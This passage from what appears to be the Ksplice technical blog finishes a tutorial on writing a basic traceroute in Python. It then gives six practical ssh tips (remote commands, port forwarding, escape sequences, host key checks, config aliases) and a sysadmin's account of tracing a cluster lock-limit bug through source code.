        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
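
One practical wrinkle (my addition, not part of the original walkthrough): as written, recvfrom() will block forever if a hop silently drops our probe instead of answering. Giving the receiving socket a deadline keeps the loop moving; when the deadline passes, recvfrom() raises socket.timeout, which we can treat like any other miss:

    recv_socket.settimeout(2)   # assumption: 2 seconds is generous for one hop
    try:
        _, curr_addr = recv_socket.recvfrom(512)
        curr_addr = curr_addr[0]
    except (socket.timeout, socket.error):
        pass   # no answer from this hop; it will be printed as "*"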
Step 6: Turn the IP addresses into hostnames and print the data.

To match traceroute's behavior, we want to try to display the hostname along with the IP address. The socket module provides the gethostbyaddr() method for reverse DNS resolution. The resolution can fail and result in an exception, in which case we'll want to catch it and make the hostname the same as the address. Once we get the hostname, we have all the information we need to print our data:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 7: End the loop.

There are two conditions for exiting our loop: either we have reached our destination (that is, curr_addr is equal to dest_addr) [1], or we have exceeded some maximum number of hops. We will set our maximum at 30:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        max_hops = 30
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            if curr_addr == dest_addr or ttl > max_hops:
                break

    if __name__ == "__main__":
        main('google.com')

Step 8: Run the code!

We're done! Let's save this to a file and run it. Because creating raw sockets requires root privileges, the real traceroute is typically installed setuid root. For our purposes, we can just run the script as root:

    $ sudo python poor-mans-traceroute.py
    [sudo] password for leonidg:
    1       router.lan (192.168.1.1)
    2       70.162.48.1 (70.162.48.1)
    3       ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)
    4       be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)
    5       pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)
    6       pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)
    7       as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)
    8       72.14.238.232 (72.14.238.232)
    9       216.239.48.24 (216.239.48.24)
    10     173.194.33.104 (173.194.33.104)

Hurrah! The data matches the real traceroute's perfectly.

Of course, there are many improvements that we could make. As I mentioned, the real traceroute has a whole slew of other features, which you can learn about by reading the manpage. In the meantime, I wrote a slightly more complete version of the above code that allows configuring the port and max number of hops, as well as specifying the destination host. You can download it at my github repository.
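
If you want to experiment before grabbing that version, here's a rough sketch (emphatically not the code from the repository) of how such options might be parsed with optparse; main() would need to be extended to accept the extra parameters:

    #!/usr/bin/python

    import optparse

    # Hypothetical command-line front end -- not the repository version.
    parser = optparse.OptionParser(usage="usage: %prog [options] destination")
    parser.add_option("-p", "--port", type="int", default=33434,
                      help="base UDP port to send probes to (default: %default)")
    parser.add_option("-m", "--max-hops", type="int", default=30,
                      help="give up after this many hops (default: %default)")
    options, args = parser.parse_args()
    if len(args) != 1:
        parser.error("please specify exactly one destination host")

    # A main() extended to accept these could then be invoked as, e.g.,
    # main(args[0], port=options.port, max_hops=options.max_hops).
    print "tracing %s (port %d, max %d hops)" % (args[0], options.port, options.max_hops)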

Alright, folks, what UNIX utility should we write next? strace, anyone? :-) [2]

[1] This is actually not quite how the real traceroute works. Rather than checking the IP addresses of the hosts and stopping when the destination address matches, it stops when it receives an ICMP "port unreachable" message, which means that the destination host has been reached. For our purposes, though, this simple address heuristic is good enough.
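
For the curious, that check could look something like this in our Python version. This is just a sketch (it isn't part of the program above), and it assumes the reply's IP header is the minimal 20 bytes, i.e. no IP options:

    # Classify the raw ICMP reply returned by recv_socket.recvfrom().
    # Type 11 ("time exceeded") means an intermediate router answered;
    # type 3, code 3 ("port unreachable") means the destination itself did.
    def reached_destination(packet):
        icmp_type = ord(packet[20])  # first byte after the 20-byte IP header
        icmp_code = ord(packet[21])
        return icmp_type == 3 and icmp_code == 3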

[2] Ksplice blogger Nelson took up a DIY strace on his personal blog, Made of Bugs.

~leonidg

Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run individual commands? Well, you can--just stick the command after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!
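
For example, a quick (hypothetical) loop over the two machines above would look something like this:

wdaher@rocksteady:~$ for host in bebop rocksteady; do ssh $host python -V; done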

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs on a host called analytics on port 80 and is only accessible from inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: the forwarded connection to analytics is made from the remote system (desktop), which sits inside the office network--and that's the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out.  ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on the host while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (192.168.1.106)' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to. In principle, you're supposed to verify this out-of-band (i.e., call up whoever runs the remote host and ask them to read off the fingerprint).

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ssh_host_rsa_key.pub (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

And you already know how to do this. username@host or -l username to specify your username, and -p portnumber to specify the port:

wdaher@rocksteady:~$ ssh -p 2222 bob.example.com
wdaher@rocksteady:~$ ssh -p 8183 waseem@alice.example.com
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio wsd.example.com

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    HostName bob.example.com
    Port 2222
    User wdaher

Host alice
    HostName alice.example.com
    Port 8183
    User waseem

Host self
    HostName wsd.example.com
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self

And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.
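
For instance, building on the port-forwarding scenario from tip 2, a hypothetical entry (the full hostname here is made up) could carry the forwarding options for you:

Host desktop
    # Hypothetical FQDN for the work machine from tip 2.
    HostName desktop.example.com
    User wdaher
    # Config-file counterpart of -L 8080:analytics:80
    LocalForward 8080 analytics:80
    # (DynamicForward 8080 is likewise the counterpart of -D 8080.)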

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!

~wdaher

Monday Jul 12, 2010

Source diving for sysadmins

As a system administrator, I work with dozens of large systems every day--Apache, MySQL, Postfix, Dovecot, and the list goes on from there. While I have a good idea of how to configure all of these pieces of software, I'm not intimately familiar with all of their code bases. And every so often, I'll run into a problem which I can't configure around.

When I'm lucky, I can reproduce the bug in a testing environment. I can then drop in arbitrary print statements, recompile with debugging flags, or otherwise modify my application to give me useful data. But all too often, I find that either the bug vanishes when it's not in my production environment, or it would simply take too much time or too many resources to even set up a testing deployment. When this happens, I find myself left with no alternative but to sift through the source code of the failing system, hoping to find clues as to the cause of the bug of the day. Doing so is never painless, but over time I've developed a set of techniques to make the source diving experience as focused and productive as possible.

To illustrate these techniques, I'll walk you through a real-world debugging experience I had a few weeks ago. I am a maintainer of the XVM project, an MIT-internal VPS service. We keep the disks of our virtual servers in shared storage, and we use clustering software to coordinate changes to the disks.

For a long time, we had happily run a cluster of four nodes. After receiving a grant for new hardware, we attempted to increase the size of our cluster from four nodes to eight nodes. But once we added the new nodes to the cluster, disaster struck. With five or more nodes in the cluster, no matter what we tried, we received the same error message:

root@babylon-four:~# lvs
 cluster request failed: Cannot allocate memory
 Can't get lock for xenvg
 Skipping volume group xenvg
 cluster request failed: Cannot allocate memory
 Can't get lock for babylon-four

And to make matters even more exciting, by the time we observed the problem, users had already booted enough virtual servers that we did not have the RAM to go back to four nodes. So there we were, with a broken cluster to debug.

Tip 1: Check the likely causes of failure first.

It can be quite tempting to believe that a given problem is caused by a bug in someone else's code rather than your own error in configuration. In reality, the common bugs in large, widely-used projects have already been squashed, meaning the most likely cause of error is something that you are doing wrong. I've lost track of the number of times I was sure I encountered a bug in some software, only to later discover that I had forgotten to set a configuration variable. So when you encounter a failure of some kind, make sure that your environment is not obviously at fault. Check your configuration files, check resource usage, check log files.

In the case of XVM, after seeing memory errors, we naturally figured we were out of memory--but free -m showed plenty of spare RAM. Thinking a rogue process might be to blame, we ran ps aux and top, but no process was consuming abnormal amounts of RAM or CPU. We consulted man pages, we scoured the relevant configuration files in /etc, and we even emailed the clustering software's user list, trying to determine if we were doing something wrong. Our efforts failed to uncover any problems on our end.

Tip 2: Gather as much debugging output as you can. You're going to need it.

Once you're sure you actually need to do a source dive, you should make sure you have all the information you can get about what your program is doing wrong. See if your program has a "debugging" or "verbosity" level you can turn up. Check /var/log/ for dedicated log files for the software under consideration, or perhaps check a standard log such as syslog. If your program does not provide enough output on its own, try using strace -p to dump the system calls it's issuing.

Before doing our clustering-software source dive, we cranked debugging as high as it would go to get the following output:

Got new connection on fd 5
Read on local socket 5, len = 28
creating pipe, [9, 10]
Creating pre&post thread
in sub thread: client = 0x69f010
Sub thread ready for work.
doing PRE command LOCK_VG 'V_xenvg' at 1 (client=0x69f010)
lock_resource 'V_xenvg-1', flags=0, mode=1
Created pre&post thread, state = 0
Writing status 12 down pipe 10
Waiting for next pre command
read on PIPE 9: 4 bytes: status: 12
background routine status was 12, sock_client=0x69f010
Send local reply

Note that this spew does not contain an obvious error message. Still, it had enough information for us to ultimately track down and fix the problem that beset us.

Tip 3: Use the right tools for the job.

Perhaps the worst part of living in a world with many debugging tools is that it's easy to waste time using the wrong ones. If you are seeing a segmentation fault or an apparent deadlock, then your first instinct should be to reach for gdb. gdb has all sorts of nifty capabilities, including the ability to attach to an already-running process. But if you don't have an obvious crash site, often the information you glean from dynamic debugging is too narrow or voluminous to be helpful. Some, such as Linus Torvalds, have even vehemently opposed debuggers in general.

Sometimes the simplest tools are the best: together grep and find can help you navigate an entire codebase knowing only fragments of text or filenames (or guesses thereof). It can also be helpful to use a language-specific tool. For C, I recommend cscope, a tool which lets you find symbol usages or definitions.

XVM's clustering problem was with a multiprocess network-based program, and we had no idea where the failure was originating. Both properties would have made the use of a dynamic debugger quite onerous. Thus we elected to dive into the source code using nothing but our familiar command-line utilities.

Tip 4: Know your error.

Examine your system's failure mode. Is it printing an error message? If so, where is that error message originating? What can possibly cause that error? If you don't understand the symptoms of a failure, you certainly won't be able to diagnose its cause.

Often, grep as you might, you won't find the text of the error message in the codebase under consideration. Rather, a standard UNIX error-reporting mechanism is to internally set the global variable errno, which is converted to a string using strerror.

Here's a Python script that I've found useful for converting the output of strerror to the corresponding symbolic error name. (Just pass the script any substring of your error as an argument.)

#!/usr/bin/env python
import errno, os, sys
msg = ' '.join(sys.argv[1:]).lower()
for i in xrange(256):
    err = os.strerror(i)
    if msg in err.lower():
        print '%s [errno %d]: %s' % (errno.errorcode.get(i, '(unknown)'), i, err)
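
For example, feeding it our error message (the script is saved here, hypothetically, as errname.py) gives:

$ ./errname.py cannot allocate memory
ENOMEM [errno 12]: Cannot allocate memory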

This script shows that the "Cannot allocate memory" message we had seen was caused by errno being set to the code ENOMEM.

Tip 5: Map lines of output to lines of code.

You can learn a lot about the state of a program by determining which lines of code it is executing. First, fetch the source code for the version of the software you are running (generally with apt-get source or yumdownloader --source). Using your handy command-line tools, you should then be able to trace lines of debugging output back to the lines of code that emitted them. You can thus determine a set of lines that are definitively being executed.

Returning to the XVM example, we used apt-get source to fetch the relevant source code and dpkg -l to verify we were running the same version. We then ran a grep for each line of debugging output we had obtained. One such invocation, grep -r "lock_resource '.*'" ., showed that the corresponding log entry was emitted by a line in the middle of a function entitled _lock_resource.

Tip 6: Be systematic.

If you've followed the preceding tips, you'll know what parts of the code the program is executing and how it's erroring out. From there, you should work systematically, eliminating parts of the code that you can prove are not contributing to your error. Be sure you have actual evidence for your conclusions--the existence of a bug indicates that the program is in an unexpected state, and thus the core assumptions of the code may be violated.

At this point in the XVM debugging, we examined the _lock_resource function. After the debugging message we had in our logs, all paths of control flow except one printed a message we had not seen. That path terminated with an error from a function called saLckResourceLock. Hence we had found the source of our error.

We also noticed that _lock_resource transforms error values returned by the function it calls using ais_to_errno. Reading the body of ais_to_errno, we noted it just maps internal error values to standard UNIX error codes. So instead of ENOMEM, the real culprit was one of SA_AIS_ERR_NO_MEMORY, SA_AIS_ERR_NO_RESOURCES, or SA_AIS_ERR_NO_SECTIONS. This certainly explained why we could see this error message even on machines with tens of gigabytes of free memory!

Ultimately, our debugging process brought us to the following block of code:

if (global_lock_count == LCK_MAX_NUM_LOCKS) {
        error = SA_AIS_ERR_NO_RESOURCES;
        goto error_exit;
}

This chunk of code felt exactly right. It was bound by some hard-coded limit (namely, LCK_MAX_NUM_LOCKS, the maximum number of locks) and hitting it returned one of the error codes we were seeking. We bumped the value of the constant and have been running smoothly ever since.

Tip 7: Make sure you really fixed it.

How many times have you been certain you finally found an elusive bug, spent hours recompiling and redeploying, and then found that the bug was actually still there? Or even better, found that the bug merely changed when it appeared, and you didn't discover this until after telling everyone that you had fixed it?

It's important that after squashing a bug, you examine, test, and sanity-check your changes. Perhaps explain your reasoning to someone else. It's all too easy to "fix" code that isn't broken, only cover a subset of the relevant cases, or introduce a new bug in your patch.

After bumping the value of LCK_MAX_NUM_LOCKS, we checked the project's changelog. We found a commit increasing the maximum number of locks without any changes to code, so our patch seemed safe. We explained our reasoning and findings to the other project developers, quietly deployed our patched version, and then after a week of stability sent an announce email proclaiming that we had fixed the cluster.

Your turn

What techniques have you found useful for debugging unfamiliar code?

~gdb

About

Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.
